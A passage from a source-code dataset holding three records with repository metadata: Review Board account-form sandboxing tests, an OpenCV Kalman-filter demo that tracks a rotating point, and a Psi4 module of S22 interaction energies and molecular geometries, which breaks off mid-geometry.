self.spy_on(SandboxAuthBackend.update_password)
form.save()
self.assertTrue(SandboxAuthBackend.update_password.called)
def test_update_name_auth_backend(self):
"""Testing sandboxing of AuthBackend.update_name."""
form = ProfileForm(page=None, request=self.request, user=self.user)
form.cleaned_data = {
'first_name': 'Barry',
'last_name': 'Allen',
'email': 'flash@example.com',
'profile_private': '',
}
self.user.email = 'flash@example.com'
self.spy_on(SandboxAuthBackend.update_name)
form.save()
self.assertTrue(SandboxAuthBackend.update_name.called)
def test_update_email_auth_backend(self):
"""Testing sandboxing of AuthBackend.update_email."""
form = ProfileForm(page=None, request=self.request, user=self.user)
form.cleaned_data = {
'first_name': 'Barry',
'last_name': 'Allen',
'email': 'flash@example.com',
'profile_private': '',
}
self.user.first_name = 'Barry'
self.user.last_name = 'Allen'
self.spy_on(SandboxAuthBackend.update_email)
form.save()
self.assertTrue(SandboxAuthBackend.update_email.called)
|
davidt/reviewboard
|
reviewboard/accounts/tests.py
|
Python
|
mit
| 19,866
|
[
"VisIt"
] |
f65ed2b4eff13a72a36890ebe52d0fd8ba7964d98677991e08a63055892753cd
|
"""
Tracking of rotating point.
Rotation speed is constant.
Both state and measurements vectors are 1D (a point angle),
Measurement is the real point angle + gaussian noise.
The real and the estimated points are connected with yellow line segment,
the real and the measured points are connected with red line segment.
(if Kalman filter works correctly,
the yellow segment should be shorter than the red one).
Pressing any key (except ESC) will reset the tracking with a different speed.
Pressing ESC will stop the program.
"""
# Python 2/3 compatibility
import sys
PY3 = sys.version_info[0] == 3
if PY3:
long = int
import cv2 as cv
from math import cos, sin, sqrt
import numpy as np
if __name__ == "__main__":
img_height = 500
img_width = 500
kalman = cv.KalmanFilter(2, 1, 0)
code = long(-1)
cv.namedWindow("Kalman")
while True:
state = 0.1 * np.random.randn(2, 1)
kalman.transitionMatrix = np.array([[1., 1.], [0., 1.]])
kalman.measurementMatrix = 1. * np.ones((1, 2))
kalman.processNoiseCov = 1e-5 * np.eye(2)
kalman.measurementNoiseCov = 1e-1 * np.ones((1, 1))
kalman.errorCovPost = 1. * np.ones((2, 2))
kalman.statePost = 0.1 * np.random.randn(2, 1)
while True:
def calc_point(angle):
return (np.around(img_width/2 + img_width/3*cos(angle), 0).astype(int),
np.around(img_height/2 - img_width/3*sin(angle), 0).astype(int))
state_angle = state[0, 0]
state_pt = calc_point(state_angle)
prediction = kalman.predict()
predict_angle = prediction[0, 0]
predict_pt = calc_point(predict_angle)
measurement = kalman.measurementNoiseCov * np.random.randn(1, 1)
# generate measurement
measurement = np.dot(kalman.measurementMatrix, state) + measurement
measurement_angle = measurement[0, 0]
measurement_pt = calc_point(measurement_angle)
# plot points
def draw_cross(center, color, d):
cv.line(img,
(center[0] - d, center[1] - d), (center[0] + d, center[1] + d),
color, 1, cv.LINE_AA, 0)
cv.line(img,
(center[0] + d, center[1] - d), (center[0] - d, center[1] + d),
color, 1, cv.LINE_AA, 0)
img = np.zeros((img_height, img_width, 3), np.uint8)
draw_cross(np.int32(state_pt), (255, 255, 255), 3)
draw_cross(np.int32(measurement_pt), (0, 0, 255), 3)
draw_cross(np.int32(predict_pt), (0, 255, 0), 3)
cv.line(img, state_pt, measurement_pt, (0, 0, 255), 3, cv.LINE_AA, 0)
cv.line(img, state_pt, predict_pt, (0, 255, 255), 3, cv.LINE_AA, 0)
kalman.correct(measurement)
process_noise = sqrt(kalman.processNoiseCov[0,0]) * np.random.randn(2, 1)
state = np.dot(kalman.transitionMatrix, state) + process_noise
cv.imshow("Kalman", img)
code = cv.waitKey(100)
if code != -1:
break
if code in [27, ord('q'), ord('Q')]:
break
cv.destroyWindow("Kalman")
|
myboycrais99/Miscellaneous
|
Tracking/example_2.py
|
Python
|
gpl-3.0
| 3,288
|
[
"Gaussian"
] |
711dce5d1c7b1beaca9363e035f0a0ec0235c42e9cce3adf5674c667b50bd4f5
|
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2022 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
"""
| Database (Hobza) of interaction energies for bimolecular complexes.
| Geometries from Jurecka et al. PCCP 8 1985 (2006).
| First revision to interaction energies (S22A) from Takatani et al. JCP 132 144104 (2010).
| Second revision to interaction energies (S22B) from Marshall et al. JCP 135 194102 (2011).
- **cp** ``'off'`` || ``'on'``
- **rlxd** ``'off'``
- **benchmark**
- ``'S220'`` Jurecka et al. PCCP 8 1985 (2006).
- ``'S22A'`` Takatani et al. JCP 132 144104 (2010).
- |dl| ``'S22B'`` |dr| Marshall et al. JCP 135 194102 (2011).
- **subset**
- ``'small'`` water dimer, methane dimer, ethene-ethine
- ``'large'`` adenine-thymine
- ``'HB'`` hydrogen-bonded systems
- ``'MX'`` mixed-influence systems
- ``'DD'`` dispersion-dominated systems
- ``'S11'`` smaller systems in S22
- ``'WATER'`` water dimer
"""
import qcdb
# <<< S22 Database Module >>>
dbse = 'S22'
# <<< Database Members >>>
HRXN = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22]
HRXN_SM = [2, 8, 16]
HRXN_LG = [15]
HB = [1, 2, 3, 4, 5, 6, 7]
MX = [13, 15, 16, 17, 18, 19, 21, 22]
DD = [8, 9, 10, 11, 12, 14, 20]
S11 = [1, 2, 3, 4, 8, 9, 10, 16, 17, 18, 19]
WATER = [2]
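# Note (added): the lists above select reaction indices for the subsets named
# in the module docstring; e.g. the 'small' subset (HRXN_SM = [2, 8, 16])
# covers the water dimer, methane dimer, and ethene-ethine systems.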
# <<< Chemical Systems Involved >>>
RXNM = {} # reaction matrix of reagent contributions per reaction
ACTV = {} # order of active reagents per reaction
ACTV_CP = {} # order of active reagents per counterpoise-corrected reaction
ACTV_SA = {} # order of active reagents for non-supramolecular calculations
for rxn in HRXN:
RXNM[ '%s-%s' % (dbse, rxn)] = {'%s-%s-dimer' % (dbse, rxn) : +1,
'%s-%s-monoA-CP' % (dbse, rxn) : -1,
'%s-%s-monoB-CP' % (dbse, rxn) : -1,
'%s-%s-monoA-unCP' % (dbse, rxn) : -1,
'%s-%s-monoB-unCP' % (dbse, rxn) : -1 }
ACTV_SA['%s-%s' % (dbse, rxn)] = ['%s-%s-dimer' % (dbse, rxn) ]
ACTV_CP['%s-%s' % (dbse, rxn)] = ['%s-%s-dimer' % (dbse, rxn),
'%s-%s-monoA-CP' % (dbse, rxn),
'%s-%s-monoB-CP' % (dbse, rxn) ]
ACTV[ '%s-%s' % (dbse, rxn)] = ['%s-%s-dimer' % (dbse, rxn),
'%s-%s-monoA-unCP' % (dbse, rxn),
'%s-%s-monoB-unCP' % (dbse, rxn) ]
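# Note (added): the dictionaries above encode the interaction-energy
# stoichiometry. With counterpoise correction the binding energy is
#   IE_CP = E(dimer) - E(monoA, dimer basis) - E(monoB, dimer basis)
# while the uncorrected variant uses the monomers in their own basis sets;
# the -1 coefficients in RXNM express these subtractions, and ACTV_CP /
# ACTV list which reagents are active in each case.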
# <<< Reference Values >>>
BIND = {}
# Original publication
BIND_S220 = {}
BIND_S220['%s-%s' % (dbse, 1)] = -3.17
BIND_S220['%s-%s' % (dbse, 2)] = -5.02
BIND_S220['%s-%s' % (dbse, 3)] = -18.61
BIND_S220['%s-%s' % (dbse, 4)] = -15.96
BIND_S220['%s-%s' % (dbse, 5)] = -20.65
BIND_S220['%s-%s' % (dbse, 6)] = -16.71
BIND_S220['%s-%s' % (dbse, 7)] = -16.37
BIND_S220['%s-%s' % (dbse, 8)] = -0.53
BIND_S220['%s-%s' % (dbse, 9)] = -1.51
BIND_S220['%s-%s' % (dbse, 10)] = -1.50
BIND_S220['%s-%s' % (dbse, 11)] = -2.73
BIND_S220['%s-%s' % (dbse, 12)] = -4.42
BIND_S220['%s-%s' % (dbse, 13)] = -10.12
BIND_S220['%s-%s' % (dbse, 14)] = -5.22
BIND_S220['%s-%s' % (dbse, 15)] = -12.23
BIND_S220['%s-%s' % (dbse, 16)] = -1.53
BIND_S220['%s-%s' % (dbse, 17)] = -3.28
BIND_S220['%s-%s' % (dbse, 18)] = -2.35
BIND_S220['%s-%s' % (dbse, 19)] = -4.46
BIND_S220['%s-%s' % (dbse, 20)] = -2.74
BIND_S220['%s-%s' % (dbse, 21)] = -5.73
BIND_S220['%s-%s' % (dbse, 22)] = -7.05
# Revision
BIND_S22A = {}
BIND_S22A['%s-%s' % (dbse, 1)] = -3.15
BIND_S22A['%s-%s' % (dbse, 2)] = -5.07
BIND_S22A['%s-%s' % (dbse, 3)] = -18.81
BIND_S22A['%s-%s' % (dbse, 4)] = -16.11
BIND_S22A['%s-%s' % (dbse, 5)] = -20.69
BIND_S22A['%s-%s' % (dbse, 6)] = -17.00
BIND_S22A['%s-%s' % (dbse, 7)] = -16.74
BIND_S22A['%s-%s' % (dbse, 8)] = -0.53
BIND_S22A['%s-%s' % (dbse, 9)] = -1.48
BIND_S22A['%s-%s' % (dbse, 10)] = -1.45
BIND_S22A['%s-%s' % (dbse, 11)] = -2.62
BIND_S22A['%s-%s' % (dbse, 12)] = -4.20
BIND_S22A['%s-%s' % (dbse, 13)] = -9.74
BIND_S22A['%s-%s' % (dbse, 14)] = -4.59
BIND_S22A['%s-%s' % (dbse, 15)] = -11.66
BIND_S22A['%s-%s' % (dbse, 16)] = -1.50
BIND_S22A['%s-%s' % (dbse, 17)] = -3.29
BIND_S22A['%s-%s' % (dbse, 18)] = -2.32
BIND_S22A['%s-%s' % (dbse, 19)] = -4.55
BIND_S22A['%s-%s' % (dbse, 20)] = -2.71
BIND_S22A['%s-%s' % (dbse, 21)] = -5.62
BIND_S22A['%s-%s' % (dbse, 22)] = -7.09
# Current revision
BIND_S22B = {}
BIND_S22B['%s-%s' % (dbse, 1)] = -3.133
BIND_S22B['%s-%s' % (dbse, 2)] = -4.989
BIND_S22B['%s-%s' % (dbse, 3)] = -18.753
BIND_S22B['%s-%s' % (dbse, 4)] = -16.062
BIND_S22B['%s-%s' % (dbse, 5)] = -20.641
BIND_S22B['%s-%s' % (dbse, 6)] = -16.934
BIND_S22B['%s-%s' % (dbse, 7)] = -16.660
BIND_S22B['%s-%s' % (dbse, 8)] = -0.527
BIND_S22B['%s-%s' % (dbse, 9)] = -1.472
BIND_S22B['%s-%s' % (dbse, 10)] = -1.448
BIND_S22B['%s-%s' % (dbse, 11)] = -2.654
BIND_S22B['%s-%s' % (dbse, 12)] = -4.255
BIND_S22B['%s-%s' % (dbse, 13)] = -9.805
BIND_S22B['%s-%s' % (dbse, 14)] = -4.524
BIND_S22B['%s-%s' % (dbse, 15)] = -11.730
BIND_S22B['%s-%s' % (dbse, 16)] = -1.496
BIND_S22B['%s-%s' % (dbse, 17)] = -3.275
BIND_S22B['%s-%s' % (dbse, 18)] = -2.312
BIND_S22B['%s-%s' % (dbse, 19)] = -4.541
BIND_S22B['%s-%s' % (dbse, 20)] = -2.717
BIND_S22B['%s-%s' % (dbse, 21)] = -5.627
BIND_S22B['%s-%s' % (dbse, 22)] = -7.097
# Set default
BIND = BIND_S22B
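# Note: the S22 reference interaction energies are conventionally reported in kcal/mol.
# BIND_S220 holds the originally published values, BIND_S22A the first revision, and
# BIND_S22B the current revision chosen as the default above, so a lookup such as
# BIND['%s-%s' % (dbse, 2)] would return the water-dimer value, -4.989, under the
# S22B default.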
# <<< Comment Lines >>>
TAGL = {}
TAGL['%s-%s' % (dbse, 1)] = 'HB-1 Ammonia Dimer, C2H'
TAGL['%s-%s-dimer' % (dbse, 1)] = 'Ammonia Dimer'
TAGL['%s-%s-monoA-CP' % (dbse, 1)] = 'Ammonia from Ammonia Dimer'
TAGL['%s-%s-monoB-CP' % (dbse, 1)] = 'Ammonia from Ammonia Dimer'
TAGL['%s-%s-monoA-unCP' % (dbse, 1)] = 'Ammonia from Ammonia Dimer'
TAGL['%s-%s-monoB-unCP' % (dbse, 1)] = 'Ammonia from Ammonia Dimer'
TAGL['%s-%s' % (dbse, 2)] = 'HB-2 Water Dimer, CS'
TAGL['%s-%s-dimer' % (dbse, 2)] = 'Water Dimer'
TAGL['%s-%s-monoA-CP' % (dbse, 2)] = 'Water from Water Dimer'
TAGL['%s-%s-monoB-CP' % (dbse, 2)] = 'Water from Water Dimer'
TAGL['%s-%s-monoA-unCP' % (dbse, 2)] = 'Water from Water Dimer'
TAGL['%s-%s-monoB-unCP' % (dbse, 2)] = 'Water from Water Dimer'
TAGL['%s-%s' % (dbse, 3)] = 'HB-3 Formic Acid Dimer, C2H'
TAGL['%s-%s-dimer' % (dbse, 3)] = 'Formic Acid Dimer'
TAGL['%s-%s-monoA-CP' % (dbse, 3)] = 'Formic Acid from Formic Acid Dimer'
TAGL['%s-%s-monoB-CP' % (dbse, 3)] = 'Formic Acid from Formic Acid Dimer'
TAGL['%s-%s-monoA-unCP' % (dbse, 3)] = 'Formic Acid from Formic Acid Dimer'
TAGL['%s-%s-monoB-unCP' % (dbse, 3)] = 'Formic Acid from Formic Acid Dimer'
TAGL['%s-%s' % (dbse, 4)] = 'HB-4 Formamide Dimer, C2H'
TAGL['%s-%s-dimer' % (dbse, 4)] = 'Formamide Dimer'
TAGL['%s-%s-monoA-CP' % (dbse, 4)] = 'Formamide from Formamide Dimer'
TAGL['%s-%s-monoB-CP' % (dbse, 4)] = 'Formamide from Formamide Dimer'
TAGL['%s-%s-monoA-unCP' % (dbse, 4)] = 'Formamide from Formamide Dimer'
TAGL['%s-%s-monoB-unCP' % (dbse, 4)] = 'Formamide from Formamide Dimer'
TAGL['%s-%s' % (dbse, 5)] = 'HB-5 Uracil Dimer HB, C2H'
TAGL['%s-%s-dimer' % (dbse, 5)] = 'Uracil Dimer HB'
TAGL['%s-%s-monoA-CP' % (dbse, 5)] = 'Uracil from Uracil Dimer HB'
TAGL['%s-%s-monoB-CP' % (dbse, 5)] = 'Uracil from Uracil Dimer HB'
TAGL['%s-%s-monoA-unCP' % (dbse, 5)] = 'Uracil from Uracil Dimer HB'
TAGL['%s-%s-monoB-unCP' % (dbse, 5)] = 'Uracil from Uracil Dimer HB'
TAGL['%s-%s' % (dbse, 6)] = 'HB-6 2-Pyridone-2-Aminopyridine Complex, C1'
TAGL['%s-%s-dimer' % (dbse, 6)] = '2-Pyridone-2-Aminopyridine Complex'
TAGL['%s-%s-monoA-CP' % (dbse, 6)] = '2-Pyridone from 2-Pyridone-2-Aminopyridine Complex'
TAGL['%s-%s-monoB-CP' % (dbse, 6)] = '2-Aminopyridine from 2-Pyridone-2-Aminopyridine Complex'
TAGL['%s-%s-monoA-unCP' % (dbse, 6)] = '2-Pyridone from 2-Pyridone-2-Aminopyridine Complex'
TAGL['%s-%s-monoB-unCP' % (dbse, 6)] = '2-Aminopyridine from 2-Pyridone-2-Aminopyridine Complex'
TAGL['%s-%s' % (dbse, 7)] = 'HB-7 Adenine-Thymine Complex WC, C1'
TAGL['%s-%s-dimer' % (dbse, 7)] = 'Adenine-Thymine Complex WC'
TAGL['%s-%s-monoA-CP' % (dbse, 7)] = 'Adenine from Adenine-Thymine Complex WC'
TAGL['%s-%s-monoB-CP' % (dbse, 7)] = 'Thymine from Adenine-Thymine Complex WC'
TAGL['%s-%s-monoA-unCP' % (dbse, 7)] = 'Adenine from Adenine-Thymine Complex WC'
TAGL['%s-%s-monoB-unCP' % (dbse, 7)] = 'Thymine from Adenine-Thymine Complex WC'
TAGL['%s-%s' % (dbse, 8)] = 'DD-1 Methane Dimer, D3D'
TAGL['%s-%s-dimer' % (dbse, 8)] = 'Methane Dimer'
TAGL['%s-%s-monoA-CP' % (dbse, 8)] = 'Methane from Methane Dimer'
TAGL['%s-%s-monoB-CP' % (dbse, 8)] = 'Methane from Methane Dimer'
TAGL['%s-%s-monoA-unCP' % (dbse, 8)] = 'Methane from Methane Dimer'
TAGL['%s-%s-monoB-unCP' % (dbse, 8)] = 'Methane from Methane Dimer'
TAGL['%s-%s' % (dbse, 9)] = 'DD-2 Ethene Dimer, D2D'
TAGL['%s-%s-dimer' % (dbse, 9)] = 'Ethene Dimer'
TAGL['%s-%s-monoA-CP' % (dbse, 9)] = 'Ethene from Ethene Dimer'
TAGL['%s-%s-monoB-CP' % (dbse, 9)] = 'Ethene from Ethene Dimer'
TAGL['%s-%s-monoA-unCP' % (dbse, 9)] = 'Ethene from Ethene Dimer'
TAGL['%s-%s-monoB-unCP' % (dbse, 9)] = 'Ethene from Ethene Dimer'
TAGL['%s-%s' % (dbse, 10)] = 'DD-3 Benzene-Methane Complex, C3'
TAGL['%s-%s-dimer' % (dbse, 10)] = 'Benzene-Methane Complex'
TAGL['%s-%s-monoA-CP' % (dbse, 10)] = 'Benzene from Benzene-Methane Complex'
TAGL['%s-%s-monoB-CP' % (dbse, 10)] = 'Methane from Benzene-Methane Complex'
TAGL['%s-%s-monoA-unCP' % (dbse, 10)] = 'Benzene from Benzene-Methane Complex'
TAGL['%s-%s-monoB-unCP' % (dbse, 10)] = 'Methane from Benzene-Methane Complex'
TAGL['%s-%s' % (dbse, 11)] = 'DD-4 Benzene Dimer Parallel-Disp, C2H'
TAGL['%s-%s-dimer' % (dbse, 11)] = 'Benzene Dimer PD'
TAGL['%s-%s-monoA-CP' % (dbse, 11)] = 'Benzene from Benzene Dimer PD'
TAGL['%s-%s-monoB-CP' % (dbse, 11)] = 'Benzene from Benzene Dimer PD'
TAGL['%s-%s-monoA-unCP' % (dbse, 11)] = 'Benzene from Benzene Dimer PD'
TAGL['%s-%s-monoB-unCP' % (dbse, 11)] = 'Benzene from Benzene Dimer PD'
TAGL['%s-%s' % (dbse, 12)] = 'DD-6 Pyrazine Dimer, CS'
TAGL['%s-%s-dimer' % (dbse, 12)] = 'Pyrazine Dimer'
TAGL['%s-%s-monoA-CP' % (dbse, 12)] = 'Pyrazine from Pyrazine Dimer'
TAGL['%s-%s-monoB-CP' % (dbse, 12)] = 'Pyrazine from Pyrazine Dimer'
TAGL['%s-%s-monoA-unCP' % (dbse, 12)] = 'Pyrazine from Pyrazine Dimer'
TAGL['%s-%s-monoB-unCP' % (dbse, 12)] = 'Pyrazine from Pyrazine Dimer'
TAGL['%s-%s' % (dbse, 13)] = 'MX-5 Uracil Dimer Stack, C2'
TAGL['%s-%s-dimer' % (dbse, 13)] = 'Uracil Dimer Stack'
TAGL['%s-%s-monoA-CP' % (dbse, 13)] = 'Uracil from Uracil Dimer Stack'
TAGL['%s-%s-monoB-CP' % (dbse, 13)] = 'Uracil from Uracil Dimer Stack'
TAGL['%s-%s-monoA-unCP' % (dbse, 13)] = 'Uracil from Uracil Dimer Stack'
TAGL['%s-%s-monoB-unCP' % (dbse, 13)] = 'Uracil from Uracil Dimer Stack'
TAGL['%s-%s' % (dbse, 14)] = 'DD-7 Indole-Benzene Complex Stack, C1'
TAGL['%s-%s-dimer' % (dbse, 14)] = 'Indole-Benzene Complex Stack'
TAGL['%s-%s-monoA-CP' % (dbse, 14)] = 'Benzene from Indole-Benzene Complex Stack'
TAGL['%s-%s-monoB-CP' % (dbse, 14)] = 'Indole from Indole-Benzene Complex Stack'
TAGL['%s-%s-monoA-unCP' % (dbse, 14)] = 'Benzene from Indole-Benzene Complex Stack'
TAGL['%s-%s-monoB-unCP' % (dbse, 14)] = 'Indole from Indole-Benzene Complex Stack'
TAGL['%s-%s' % (dbse, 15)] = 'MX-8 Adenine-Thymine Complex Stack, C1'
TAGL['%s-%s-dimer' % (dbse, 15)] = 'Adenine-Thymine Complex Stack'
TAGL['%s-%s-monoA-CP' % (dbse, 15)] = 'Adenine from Adenine-Thymine Complex Stack'
TAGL['%s-%s-monoB-CP' % (dbse, 15)] = 'Thymine from Adenine-Thymine Complex Stack'
TAGL['%s-%s-monoA-unCP' % (dbse, 15)] = 'Adenine from Adenine-Thymine Complex Stack'
TAGL['%s-%s-monoB-unCP' % (dbse, 15)] = 'Thymine from Adenine-Thymine Complex Stack'
TAGL['%s-%s' % (dbse, 16)] = 'MX-1 Ethene-Ethine Complex, C2V'
TAGL['%s-%s-dimer' % (dbse, 16)] = 'Ethene-Ethine Complex'
TAGL['%s-%s-monoA-CP' % (dbse, 16)] = 'Ethene from Ethene-Ethine Complex'
TAGL['%s-%s-monoB-CP' % (dbse, 16)] = 'Ethine from Ethene-Ethine Complex'
TAGL['%s-%s-monoA-unCP' % (dbse, 16)] = 'Ethene from Ethene-Ethine Complex'
TAGL['%s-%s-monoB-unCP' % (dbse, 16)] = 'Ethine from Ethene-Ethine Complex'
TAGL['%s-%s' % (dbse, 17)] = 'MX-2 Benzene-Water Complex, CS'
TAGL['%s-%s-dimer' % (dbse, 17)] = 'Benzene-Water Complex'
TAGL['%s-%s-monoA-CP' % (dbse, 17)] = 'Benzene from Benzene-Water Complex'
TAGL['%s-%s-monoB-CP' % (dbse, 17)] = 'Water from Benzene-Water Complex'
TAGL['%s-%s-monoA-unCP' % (dbse, 17)] = 'Benzene from Benzene-Water Complex'
TAGL['%s-%s-monoB-unCP' % (dbse, 17)] = 'Water from Benzene-Water Complex'
TAGL['%s-%s' % (dbse, 18)] = 'MX-3 Benzene-Ammonia Complex, CS'
TAGL['%s-%s-dimer' % (dbse, 18)] = 'Benzene-Ammonia Complex'
TAGL['%s-%s-monoA-CP' % (dbse, 18)] = 'Benzene from Benzene-Ammonia Complex'
TAGL['%s-%s-monoB-CP' % (dbse, 18)] = 'Ammonia from Benzene-Ammonia Complex'
TAGL['%s-%s-monoA-unCP' % (dbse, 18)] = 'Benzene from Benzene-Ammonia Complex'
TAGL['%s-%s-monoB-unCP' % (dbse, 18)] = 'Ammonia from Benzene-Ammonia Complex'
TAGL['%s-%s' % (dbse, 19)] = 'MX-4 Benzene-HCN Complex, CS'
TAGL['%s-%s-dimer' % (dbse, 19)] = 'Benzene-HCN Complex'
TAGL['%s-%s-monoA-CP' % (dbse, 19)] = 'Benzene from Benzene-HCN Complex'
TAGL['%s-%s-monoB-CP' % (dbse, 19)] = 'HCN from Benzene-HCN Complex'
TAGL['%s-%s-monoA-unCP' % (dbse, 19)] = 'Benzene from Benzene-HCN Complex'
TAGL['%s-%s-monoB-unCP' % (dbse, 19)] = 'HCN from Benzene-HCN Complex'
TAGL['%s-%s' % (dbse, 20)] = 'DD-5 Benzene Dimer T-Shape, C2V'
TAGL['%s-%s-dimer' % (dbse, 20)] = 'Benzene Dimer T-Shape'
TAGL['%s-%s-monoA-CP' % (dbse, 20)] = 'Benzene from Benzene Dimer T-Shape'
TAGL['%s-%s-monoB-CP' % (dbse, 20)] = 'Benzene from Benzene Dimer T-Shape'
TAGL['%s-%s-monoA-unCP' % (dbse, 20)] = 'Benzene from Benzene Dimer T-Shape'
TAGL['%s-%s-monoB-unCP' % (dbse, 20)] = 'Benzene from Benzene Dimer T-Shape'
TAGL['%s-%s' % (dbse, 21)] = 'MX-6 Indole-Benzene Complex T-Shape, C1'
TAGL['%s-%s-dimer' % (dbse, 21)] = 'Indole-Benzene Complex T-Shape'
TAGL['%s-%s-monoA-CP' % (dbse, 21)] = 'Benzene from Indole-Benzene Complex T-Shape'
TAGL['%s-%s-monoB-CP' % (dbse, 21)] = 'Indole from Indole-Benzene Complex T-Shape'
TAGL['%s-%s-monoA-unCP' % (dbse, 21)] = 'Benzene from Indole-Benzene Complex T-Shape'
TAGL['%s-%s-monoB-unCP' % (dbse, 21)] = 'Indole from Indole-Benzene Complex T-Shape'
TAGL['%s-%s' % (dbse, 22)] = 'MX-7 Phenol Dimer, C1'
TAGL['%s-%s-dimer' % (dbse, 22)] = 'Phenol Dimer'
TAGL['%s-%s-monoA-CP' % (dbse, 22)] = 'Phenol from Phenol Dimer'
TAGL['%s-%s-monoB-CP' % (dbse, 22)] = 'Phenol from Phenol Dimer'
TAGL['%s-%s-monoA-unCP' % (dbse, 22)] = 'Phenol from Phenol Dimer'
TAGL['%s-%s-monoB-unCP' % (dbse, 22)] = 'Phenol from Phenol Dimer'
# <<< Geometry Specification Strings >>>
GEOS = {}
GEOS['%s-%s-dimer' % (dbse, '1')] = qcdb.Molecule("""
0 1
N -1.578718 -0.046611 0.000000
H -2.158621 0.136396 -0.809565
H -2.158621 0.136396 0.809565
H -0.849471 0.658193 0.000000
--
0 1
N 1.578718 0.046611 0.000000
H 2.158621 -0.136396 -0.809565
H 0.849471 -0.658193 0.000000
H 2.158621 -0.136396 0.809565
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '2')] = qcdb.Molecule("""
0 1
O -1.551007 -0.114520 0.000000
H -1.934259 0.762503 0.000000
H -0.599677 0.040712 0.000000
--
0 1
O 1.350625 0.111469 0.000000
H 1.680398 -0.373741 -0.758561
H 1.680398 -0.373741 0.758561
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '3')] = qcdb.Molecule("""
0 1
C -1.888896 -0.179692 0.000000
O -1.493280 1.073689 0.000000
O -1.170435 -1.166590 0.000000
H -2.979488 -0.258829 0.000000
H -0.498833 1.107195 0.000000
--
0 1
C 1.888896 0.179692 0.000000
O 1.493280 -1.073689 0.000000
O 1.170435 1.166590 0.000000
H 2.979488 0.258829 0.000000
H 0.498833 -1.107195 0.000000
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '4')] = qcdb.Molecule("""
0 1
C -2.018649 0.052883 0.000000
O -1.452200 1.143634 0.000000
N -1.407770 -1.142484 0.000000
H -1.964596 -1.977036 0.000000
H -0.387244 -1.207782 0.000000
H -3.117061 -0.013701 0.000000
--
0 1
C 2.018649 -0.052883 0.000000
O 1.452200 -1.143634 0.000000
N 1.407770 1.142484 0.000000
H 1.964596 1.977036 0.000000
H 0.387244 1.207782 0.000000
H 3.117061 0.013701 0.000000
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '5')] = qcdb.Molecule("""
0 1
O -1.4663316 1.0121693 0.0000000
C -0.6281464 1.9142678 0.0000000
N 0.7205093 1.6882688 0.0000000
C 1.6367290 2.7052764 0.0000000
C 1.2769036 4.0061763 0.0000000
C -0.1286005 4.3621549 0.0000000
N -0.9777230 3.2396433 0.0000000
O -0.5972229 5.4864066 0.0000000
H 2.0103504 4.7938642 0.0000000
H 1.0232515 0.7061820 0.0000000
H -1.9700268 3.4323850 0.0000000
H 2.6690620 2.3883417 0.0000000
--
0 1
O 1.4663316 -1.0121693 0.0000000
C 0.6281464 -1.9142678 0.0000000
N -0.7205093 -1.6882688 0.0000000
C -1.6367290 -2.7052764 0.0000000
C -1.2769036 -4.0061763 0.0000000
C 0.1286005 -4.3621549 0.0000000
N 0.9777230 -3.2396433 0.0000000
O 0.5972229 -5.4864066 0.0000000
H -2.0103504 -4.7938642 0.0000000
H -1.0232515 -0.7061820 0.0000000
H 1.9700268 -3.4323850 0.0000000
H -2.6690620 -2.3883417 0.0000000
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '6')] = qcdb.Molecule("""
0 1
O -1.3976213 -1.8858368 -0.3673061
N -1.4642550 0.3641828 0.0192301
C -4.1857398 0.3696669 0.0360960
C -3.4832598 1.5783111 0.2500752
C -2.1179502 1.5307048 0.2338383
C -2.0773833 -0.8637492 -0.1899414
C -3.5156032 -0.8051950 -0.1757585
H -5.2678045 0.3707428 0.0411419
H -3.9920334 2.5127560 0.4214414
H -1.4929196 2.3984096 0.3885018
H -4.0401226 -1.7348452 -0.3379269
H -0.4265266 0.3612127 0.0073538
--
0 1
N 1.4327616 0.3639703 -0.0159508
C 2.1154200 -0.7803450 0.1681099
C 3.5237586 -0.8016096 0.1545027
C 4.2185897 0.3735783 -0.0525929
C 3.5099708 1.5615014 -0.2449763
C 2.1280138 1.4953324 -0.2175374
H 4.0459206 -1.7361356 0.3076883
H 5.2999426 0.3666009 -0.0663349
H 4.0110923 2.5024313 -0.4130052
H 1.5339878 2.3893837 -0.3670565
N 1.3883123 -1.9083038 0.4198149
H 1.8694714 -2.7812773 0.2940385
H 0.4089067 -1.9079942 0.1300860
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '7')] = qcdb.Molecule("""
0 1
N 0.9350155 -0.0279801 -0.3788916
C 1.6739638 -0.0357766 0.7424316
C 3.0747955 -0.0094480 0.5994562
C 3.5646109 0.0195446 -0.7059872
N 2.8531510 0.0258031 -1.8409596
C 1.5490760 0.0012569 -1.5808009
N 4.0885824 -0.0054429 1.5289786
C 5.1829921 0.0253971 0.7872176
N 4.9294871 0.0412404 -0.5567274
N 1.0716177 -0.0765366 1.9391390
H 0.8794435 0.0050260 -2.4315709
H 6.1882591 0.0375542 1.1738824
H 5.6035368 0.0648755 -1.3036811
H 0.0586915 -0.0423765 2.0039181
H 1.6443796 -0.0347395 2.7619159
--
0 1
N -3.9211729 -0.0009646 -1.5163659
C -4.6136833 0.0169051 -0.3336520
C -3.9917387 0.0219348 0.8663338
C -2.5361367 0.0074651 0.8766724
N -1.9256484 -0.0110593 -0.3638948
C -2.5395897 -0.0149474 -1.5962357
C -4.7106131 0.0413373 2.1738637
O -1.8674730 0.0112093 1.9120833
O -1.9416783 -0.0291878 -2.6573783
H -4.4017172 -0.0036078 -2.4004924
H -0.8838255 -0.0216168 -0.3784269
H -5.6909220 0.0269347 -0.4227183
H -4.4439282 -0.8302573 2.7695655
H -4.4267056 0.9186178 2.7530256
